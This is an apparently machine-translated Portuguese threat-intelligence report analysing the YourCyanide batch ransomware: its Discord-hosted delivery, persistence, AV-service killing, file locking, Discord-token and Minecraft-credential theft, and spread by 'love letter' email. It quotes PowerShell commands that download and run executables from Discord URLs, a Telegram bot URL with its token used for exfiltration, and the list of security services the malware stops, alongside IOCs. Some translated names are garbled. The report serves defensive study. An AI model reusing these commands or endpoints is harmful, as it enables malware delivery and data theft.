YourCyanide: Uma investigação sobre o ransomware 'The Frankenstein' que envia cartas de amor repletas de malware

Autores: Anandeshwar Unnikrishnan, Rishika Desai, Benila Susan Jacob

Sumário executivo

CloudSEKda plataforma contextual de monitoramento de risco digital de IA XV Vigília deparei com a cepa de ransomware baseada em CMD YourCyanide sendo explorada na natureza. O YourCyanide usa o Discord, o Microsoft Office e o Pastebin como parte de seu mecanismo de download de carga útil, fazendo anexos do Discord e solicitações de URL.

Uma análise dos impactos do ransomware revela que ele pode ser utilizado para comprometer detalhes comerciais confidenciais, práticas e IP. Também existe um risco potencial de aquisição ou encerramento das operações da empresa, resultando em perda de receita e reputação.

As medidas de mitigação consistem em auditar e monitorar registros de eventos e incidentes para identificar padrões e comportamentos incomuns. Tem que haver um mecanismo sistemático para impor a proteção, recuperação e recuperação de dados. Além disso, configurações de segurança em dispositivos de infraestrutura de rede, como firewall e roteadores, precisam ser implementadas.

Análise e atribuição de YourCynaide

CloudSEKA equipe de pesquisa de ameaças da conduziu uma investigação sobre o novo e sofisticado ransomware 'YourCyanide', que está sendo explorado na natureza.

Essa variedade de ransomware baseada em CMD é distribuída principalmente como um anexo do Discord e faz solicitações de URL para o Microsoft Office e o Pastebin. Pesquisadores da Trend Micro descobriram que as raízes do YourCyanide remontam à família de ransomware GonnaCope, que surgiu pela primeira vez em abril de 2022.

 

Características do malware

A equipe de pesquisa de ameaças da CloudSEK descobriu os seguintes recursos do ransomware YourCyanide e de seus operadores:

• O arquivo de execução do ransomware é entregue como um anexo do Discord, conforme mostrado abaixo:

Entrega de ransomware: (new-object net.webclient) .downloadfile (“https://cdn.discordapp.com/attachments/971160786015772724/971191444410875914/GetToken.exe”, “GetToken.exe”)

Entrega de ransomware: (new-object net.webclient) .downloadfile (“https://cdn.discordapp.com/attachments/974798125011198003/976894591552860220/NoKeyB.exe”, “NoKeyB.exe”)

• O arquivo ofuscado de YourCyanide, quando desofuscado, busca o executável GetToken.exe.
• O ransomware criptografa arquivos e os renomeia com uma extensão.cyn.
• O arquivo.cmd do módulo YourCyanide é descartado por outro arquivo malicioso CaffeJuice.exe.
• O caminho da nota de resgate é C:\Users\Admin\Desktop\YcynNote.txt.

• 

   

• O agente da ameaça compartilha seu nome, endereço da carteira BTC, canal de contato e número de arquivos criptografados na nota de resgate.
• O grupo de ransomware geralmente exige USD 500 de suas vítimas para restaurar seus arquivos.

Associação com APT/outros grupos de ransomware

• A amostra YourCyanide disponível indica que pode ser uma variante do ransomware Kekpop (também conhecido como Kekware); o ransomware descarta um arquivo 'other.txt' que menciona o Kekpop. Nossa pesquisa também confirma que o mesmo executável Get.exe é usado para entregar o ransomware Kekpop e YourCyanide.

 

• Outra semelhança que liga Kekpop e YourCyanide é o arquivo 'black.bat' que é descartado em ambas as instâncias.

Análise técnica do YourCyanide Ransomware

Execução inicial

Um arquivo LNK malicioso “powershell.exe.lnk” executa um comando Powershell que recupera o executável “YourCyanide.exe” do servidor Discord e o executa no sistema da vítima para iniciar o ransomware YourCyanide.

 

C:\Windows\System32\WindowsPowerShell\v1.0\ powershell.exe -Command “(New-Object Net.WebClient) .downloadFile ('https://cdn.discordapp.com/attachments/974799607894769704/975527548983341056/YourCyanide.exe', 'YourCyanide.exe')”; inicie YourCyanide.exe

Mecanismo de entrega — Conta-gotas

O binário malicioso YourCyanide.exe, baixado pelo arquivo LNK, atua como um dropper de ransomware. Ele executa as seguintes operações no sistema:

• O YourCyanide.exe cria um novo diretório “IXP000.TMP” no diretório temporário do usuário.
• Ele despeja YourCyanide.cmd no diretório recém-criado. O conteúdo do arquivo é mostrado na imagem a seguir.
• O dropper executa o script em lote para buscar o conteúdo do Pastebin e o salva como YourCyanide.cmd, que é o ransomware real escrito em script em lote.

 

• Antes de sair, o dropper exclui o arquivo descartado e o diretório em Temp.

Persistência

• O principal código de ransomware obtido do Pastebin está fortemente ofuscado com várias camadas de substituições e fatias de strings, para impedir sua análise ou detecção.

 

• Uma análise mais aprofundada do código desofuscado mostra que o programa em lote define seu sistema e seus atributos ocultos, conforme mostrado abaixo:

 

• O atributo oculto, quando definido, oculta o arquivo correspondente do usuário, enquanto o atributo do sistema engana o sistema operacional para tratar o arquivo como crucial. Assim, no caso de alteração ou exclusão, esses arquivos permanecem inalterados, de forma semelhante aos arquivos do sistema.
• O malware atinge a persistência por meio dos seguintes pontos de extensibilidade do AutoStart:
  • Executar chave de registro
  • Pasta de inicialização

Processo de criptografia

• O malware cria um novo valor “rundll32_474_toolbar” em Run Key no registro e fornece o nome do arquivo em lote malicioso como dados para a nova entrada do registro. Finalmente, uma cópia do malware é salva na pasta Startup. Quando o malware atinge a persistência, ele cria um novo arquivo em lote “AuToexEc.BAT” na unidade C:\.
• O arquivo BAT consiste no comando para iniciar um novo processo da mesma cópia do malware. Posteriormente, o Gerenciador de Tarefas é desativado por meio do registro. Todas essas operações são mostradas na imagem abaixo.

 

• O malware também verifica a existência de AUTOEXEC.BAT no sistema da vítima. E se encontrado, ele é substituído por si mesmo, conforme mostrado abaixo. No antigo sistema DOS, o AUTOEXEC.BAT era usado como um mecanismo de execução automática, após a inicialização do sistema.

 

• Além disso, o ransomware verifica o ambiente de análise verificando o nome de usuário. Esses nomes de usuário são todos retirados de sandboxes populares na Internet. O malware sai do sistema se o nome de usuário corresponder a qualquer um dos nomes de usuário mencionados no código abaixo.

 

• Um arquivo chamado “black.bat” é colocado no diretório de documentos do usuário. O conteúdo é gravado dinamicamente no lote descartado, conforme mostrado abaixo. O arquivo em lote descartado executa um protetor de tela preto chamando o arquivo scrnsave.scr. A execução do arquivo faz com que a tela do usuário fique em branco.

 

Serviços de destino

O malware encerra os seguintes serviços no sistema de destino:

Serviços direcionados

• WinDefend
• Wuauserv
• Serviço Norton AntiVirus Firewall Monitor
• Gerenciador de atualizações do McAfee SecurityCenter
• crmonsvc
• CCSetMgr
• Serviço de drivers de rede da Symantec
• Serviço MPF
• helpsvc
• *Symantec*
• Symantec Core LC
• Serviço Norton AntiVirus Auto Protect
• Servidor Norton AntiVirus
• McShield
• em Ort
• Cliente Norton AntiVirus
• Firewall pessoal PC-cillin
• Mecanismo em tempo real do McAfee.com VirusScan Online
• Antivírus Sophos
• Servidor eTrust Antivirus em tempo real
• net stop netsvcs

• Centro de segurança
• Atualizações automáticas
• Servidor McAfee Spamkiller
• Symantec SPBbcSvc
• MonsVCNT
• CCevtMgr
• Proteção Norton Unerase
• mcupdmgr.exe
• ErSvc
• *McAfee*
• navapsvc
• Cliente Norton AntiVirus
• Alerta NAV
• DefWatch
• InoTask
• Edição Corporativa do Norton AntiVirus
• Serviço Trend Micro Proxy
• Serviço Sygate
• Rede de antivírus Sophos
• Sygate Personal Firewall Pro
• Spoolnt

• Symantec Core LC
• Sav Scan
• Serviço McAfee Personal Firewall
• Agendador de tarefas do Ahnlab
• Serviço nProtect
• serviço sr
• Serviço MSK
• McAfee AntiSpyware
• *norton*
• CCPWDSvc
• Serv-U
• Cliente Symantec AntiVirus
• Nav Auto-Protect
• registro de eventos
• Serviço Norton AntiVirus Auto Protect
• Monitoramento profissional ViRobot
• McAfee.com McShield
• Sygate Personal Firewall Pro
• Servidor de tarefas do eTrust Antivirus
• Servidor RPC eTrust Antivirus

Tarefas

O malware encerra os seguintes processos em execução no sistema:

Processos em execução direcionados

• MSASCui.exe
• Excel
• Acesso incompleto
• Perspectiva
• Firefox

• Eu exploro
• iTunes
• Safari
• tskill WINWORD
• Fio de limão

• Msnmsgr
• Calc
• Mspaint
• Msnmsgr

Manipulação de dados

Depois de encerrar vários serviços de proteção e executar tarefas, o malware bloqueia os dados no sistema de destino, conforme mostrado abaixo. Os seguintes diretórios e seus subdiretórios são percorridos para realizar o bloqueio:

• Desktop
• Documentos
• Música
• Imagens
• Vídeos
• Downloads

 

Os arquivos são renomeados para um número aleatório obtido da multiplicação de números aleatórios, seguido pelo qual uma extensão de “cyn” é anexada. Depois que os arquivos são renomeados, dados aleatórios são gravados no arquivo do usuário.

O malware libera outro arquivo em lote chamado “2b2crypt.cmd” para bloquear os dados relacionados ao Minecraft, conforme mostrado abaixo. A lógica usada para o bloqueio é a mesma vista antes. Os diretórios “.minecraft” e “.minecraft\ mods” são alvo do malware, conforme mostrado abaixo. Depois de gravar o conteúdo do arquivo em lote, ele é executado para iniciar o bloqueio dos dados.

 

O script Logger

• Usando o Powershell, o malware recupera outro arquivo em lote “ycynlog.cmd” e o executa no sistema de destino.

 

• O “ycynlog.cmd” está fortemente ofuscado com a mesma lógica usada para o arquivo de lote principal do ransomware. As instruções em lote hospedadas no Pastebin são mostradas abaixo. Esse script malicioso atua como um registrador de dados do usuário e envia os dados para um bot do Telegram (https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument? chat_id=-655682538).

 

• O script ycynlog.cmd, assim como o script principal de ransomware, inicia a execução definindo Executar chaves de registro para obter persistência no sistema de destino e também descarta o arquivo ycynlog.cmd na pasta Startup.
• O script do registrador baixa um arquivo executável adicional hospedado em CDN do Discord e o executa no sistema.

GetToken binário

• GetToken é um programa C#/.NET usado para roubar os tokens do Discord dos usuários. O ladrão contém caminhos de diretório codificados para o Discord e o armazenamento local de vários navegadores da web, conforme mostrado na imagem abaixo.

 

• Os tokens são identificados usando a correspondência de padrões Regex, conforme mostrado abaixo. Se uma correspondência for encontrada, o ladrão verifica a validade do token chamando a função tokenUtil.checkToken.

 

• A validade do token é realizada conectando-se ao servidor Discord e monitorando a resposta do servidor. A rotina de verificação do token é mostrada abaixo. Os tokens válidos são retornados para a função chamadora.

• O ladrão cria um arquivo Tokens.txt no sistema da vítima e despeja todos os tokens válidos encontrados. Se não houver tokens presentes, o valor que será gravado em Tokens.txt será “Retard Has No Tokens”. O ransomware finalmente envia o Token.txt para o bot do Telegram.

 

• O endereço IP global da vítima é recuperado enviando uma solicitação para https://ipv4.wtfismyip.com/text por meio de curl e a saída é armazenada como IP.txt.
• O script recupera uma lista de aplicativos instalados no sistema e a armazena em apps.txt para enviá-la posteriormente ao bot do Telegram.
• O WMI é usado extensivamente para recuperar informações do usuário no nível do sistema. A lista a seguir resume os dados enumerados pelo script:
  • Nome de usuário
  • Endereço IP (local)
  • Dados de configuração de rede
  • Informações do MAC
  • Dados da CPU
  • Dados de memória física
  • Informações do disco, como detalhes da partição
  • Informações do sistema Windows
  • Informações de licença do Windows (chave do produto)
• Os dados acima, juntamente com o Tokens.txt gerado pelo GetToken.exe, são enviados para o bot do Telegram. Além disso, os scripts do registrador roubam os seguintes dados específicos do usuário do Minecraft:

 

• • Launcher_msa_credentials.bin
  • Launcher_msa_credentials_microsoft_store.bin
  • launcher_accounts.json
  • Launcher_accounts_Microsoft_Store.json
  • launcher_product_state.json
  • launcher_profiles.json
• Usando o Powershell, o script do registrador baixa o ForMe.txt de Nuvem do Google e o executa no sistema.

 

• O ForMe.exe despeja dados no ForMe.txt, que posteriormente são enviados para o bot do Telegram. Infelizmente, no momento de nossa análise, o link do Google Cloud não exibia o arquivo. Nossa pesquisa indica que ele pode ser um ladrão de senhas de navegador.
• O script de ransomware então descarta um arquivo em lote chamado “fuckports.cmd”. As instruções para adicionar regras de firewall personalizadas são escritas no arquivo batch, conforme mostrado abaixo. As regras de firewall a seguir permitem tráfego UDP de entrada para a porta 2835 e tráfego UDP de saída até 16981.

 

• O malware se adiciona aos arquivos win.ini e system.ini. Esses arquivos contêm arquivos de configuração para iniciar programas e outras configurações após a inicialização do sistema. O malware elimina dois arquivos em lote, “confession.bat” e “Check This Out.bat”, que têm finalidades idênticas.

 

 

• YourCyanide também é capaz de se espalhar pelo correio. Ele utiliza APIs do Visual Basic para se comunicar com o Microsoft Outlook e envia uma cópia de si mesmo como anexo de e-mail. O malware então coloca “loveletter.vbs” no diretório Documents.
• O script VB recupera a lista de endereços do usuário e envia um e-mail com o assunto “Estou apaixonado por você” e uma mensagem que diz “leia-me”. O anexo do e-mail contém uma cópia do programa em lote de ransomware.

 

Coleção Ransom

• O malware descarta um arquivo vbs adicional chamado “mail.vbs” com o mesmo conteúdo mencionado acima. No entanto, ele enviará um e-mail com o assunto “Confira isso”.

 

• O ransomware usa o comando Powershell Out-Printer para imprimir várias cópias da nota de resgate.

 

• O malware também se copia para outras unidades presentes no sistema, conforme mostrado abaixo:

 

• Notavelmente, o YouCyanide altera a associação de arquivos de vbs, sln, js, css e ini. Ao abrir esses arquivos, o sistema transfere seu controle para um programa associado. O malware associa os tipos de arquivo listados a si mesmo. O malware é executado quando tipos de arquivos semelhantes são abertos.

 

• O malware ativa a área de trabalho remota no sistema de destino, conforme mostrado abaixo, e inicia o TermService ou serviço de terminal, responsável por lidar com as tarefas relacionadas ao RDP.

 

• Finalmente, a nota de resgate é exibida para o usuário e cria uma configuração de execução automática para as unidades disponíveis no sistema que leva à execução do próprio malware, conforme mostrado abaixo.

Impacto e mitigação

ImpactoMitigação

• As credenciais roubadas podem permitir o acesso às redes da organização.
• As informações de identificação pessoal (PII) expostas podem ser usadas para orquestrar esquemas de engenharia social, ataques de phishing e até mesmo roubo de identidade.
• As credenciais expostas podem ser aproveitadas para acessar outras contas dos usuários, devido à reutilização de senhas.
• Os dados expostos podem revelar práticas comerciais e propriedade intelectual.

• Use inteligência proativa contra ameaças para prevenir e alertar os usuários sobre possíveis ameaças e fortalecer a postura de segurança externa.
• Redefina as credenciais de login comprometidas e implemente uma política de senha forte para contas de usuário.
• Use MFA (autenticação multifator) em todos os logins.
• Verifique as possíveis soluções alternativas e corrija todos os endpoints vulneráveis e exploráveis, mantendo as portas abertas.
• Monitore anomalias que possam ser indicadores de possíveis aquisições.

Indicadores de compromisso (IOCs)

SHA256

• 9e973f75c22c718c7438bc1d4614be11ae18e2d5140ecc44c166b5f5102d5fbe
• c5d842735709618ee4f2521c95bf029a0690c3cbe5f7a06a916f633ebe09dd50
• 6A645F72ACF1D6C906E8C844E4E8B3FC92C411BF69937CFE7069DF2CC51B8A4E
• 6AD08FE301CAAE18941487412E96CEB0B561DE4482DA25EA4BB8EEB6C1A40983
• 6ab0e2e13c32b18b06b9b93b1fe607a7e04a5c0ba09816c36fba1573a47ded91
• f8860ce270a2dec3ae1c51ff2c9aea5efe0015d519ebac4ca4c1ac0d97e73323
• 8f0dbf9a6841ced62d7f5c130f420bd5a2b39141097fefba9727034d1bf3b402
• 67a1e573955304887d30ff924eb01ba8a60a188835d7275265ecc716360fb0cf
• a3523e2ba2c221593a0c16640bfeef8cd146f747fa62620cc2834e417578c34c
• 0ed64dd6e08e5b9c9282966f439ab8881b4611052838db1ef79fabc38b8a61d2
• 298c325bbc80af8b3ac77365dd7cc3f97000a8377f36937d8563ab743a92b21c
• 07fab8134ff635078cab876dba1e35c536936d193a3667637e0561c6efbb0a85

URL

• https://pastebin.com/raw/2K5m42Xp
• https://cdn.discordapp.com/attachments/971160786015772724/971191444410875914/GetToken.exe
• https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument? chat_id=-655682538
• https://ipv4.wtfismyip.com/text

• https://doc-0k-0k-docs.googleusercontent.com/docs/securesc/hg4h2398q99ghdi837vesvkmkv3nlr6u/ai385da1543uhdsi9bioneodrj6ljsd0/1652563275000/10334864966473916138/10334864966473916138/1qubjLFibSRfpNaX8z2SkwfHMiaQGKkn5?e=download&ax=ACxEAsayVkeHdNE6Rd2bptmdqZSTVYKwRPoiFNDJuQVnig_FKMx1vCzDipGZR7IOdO-2g1gOL15FljJPButVcD1jYwAdz9PxfiRxRrf-IXEkxwIn-KYy0NfynS5Us2LkVa8lUVIgCh3AETDK76rTtUf2Yv77eLHmSWmY57tXc_sPH9QpvJSYgJ_RdbREqd4SAbnWHFihxQMttNZe7vjevvlVc0nAwXWhmoXnCdTJpoN0OOQbhl8PmoHcm03iAReIe_KnHS9uuidU_VxCPtmQU97uGRj-XxZFqfTRF5kFTSf7YukXosSBxivgSZbaXMD0fWkmh1Gw51Waxqfc5G0I_ hqpgmf3xzwivb2fmhyn-a2nefhwvqauopcqnynxoqq2uulagdcqjyx4x_ehwrscmfddl7tzs9u2e-cqfi

Domínio

• Pastebin

• Wtf é meu IP

• Aplicativo Discord

• Telegram

Referências

• ^#https://en.wikipedia.org/wiki/Traffic_Light_Protocol
• Triagem
• Qualquer corrida